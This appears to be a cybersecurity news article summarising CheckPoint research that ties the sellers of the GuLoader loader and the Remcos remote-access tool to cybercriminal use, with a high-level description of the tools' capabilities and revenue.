There have been two instances of software distributors that have disguised themselves as having legitimate purposes but were actually operating with malicious intent.
Threat actors adopting the use of two software, GuLoader (also known as CloudEyE Protector) and Remcos (Remote administration tool), for malicious purposes have seen a rise since the last quarter of 2022.
Though both of these tools advertise themselves as they are only used for legitimate purposes, their primary customers have been identified to be cybercriminals. Antivirus solutions easily detect Remcos, whereas GuLoader can help bypass the protection.
Attend the Live DDoS Website & API Attack Simulation webinar to gain knowledge on various types of attacks and how to prevent them.
According to CheckPoint’s findings, the Utopia project website was responsible for the distribution of both of these tools, which were managed by an administrator.
However, this administrator was also found to be the one who was handling the BreakingSecurity website, the official website for Remcos RAT, and its related Telegram channels.
This brought light to the shadows, revealing that sellers of Remcos and GuLoader are clearly aware that cybercriminals are constantly using their tools.
The person selling Remcos and GuLoader uses malware like Amadey and Formbook and uses GuLoader to bypass antivirus detection and protection.
GuLoader & Remcos
GuLoader is a shellcode-based loader that employs multiple techniques for preventing both manual and automated malware analysis.
GuLoader’s most recent version employs a multi-stage loading mechanism that involves utilizing LNK files, VBS, and PowerShell scripts to fetch code fragments from remote servers. This approach effectively results in a zero-detection rate.
Remcos, Introduced in 2016, is a well-known targeted monitoring tool marketed for the legitimate use of tracking and monitoring.
In addition to this, Remcos offers several uncommon functionalities such as password stealing, tracking browser history, stealing cookies, keylogging, and webcam control, which are beyond the typical scope of a RAT.
It is worth noting that Remcos was first introduced in the hacking forums before it was marketed as legitimate purpose software.
However, the revenue generated by Remcos underground usage is estimated to be 59,685.08 and an average of $15,000 a month.
A complete report indicating the relationship between these two tools has been published by CheckPoint, which provides detailed information about the telegram channel messages, the social network links, their revenue, indicators of compromise, and other information.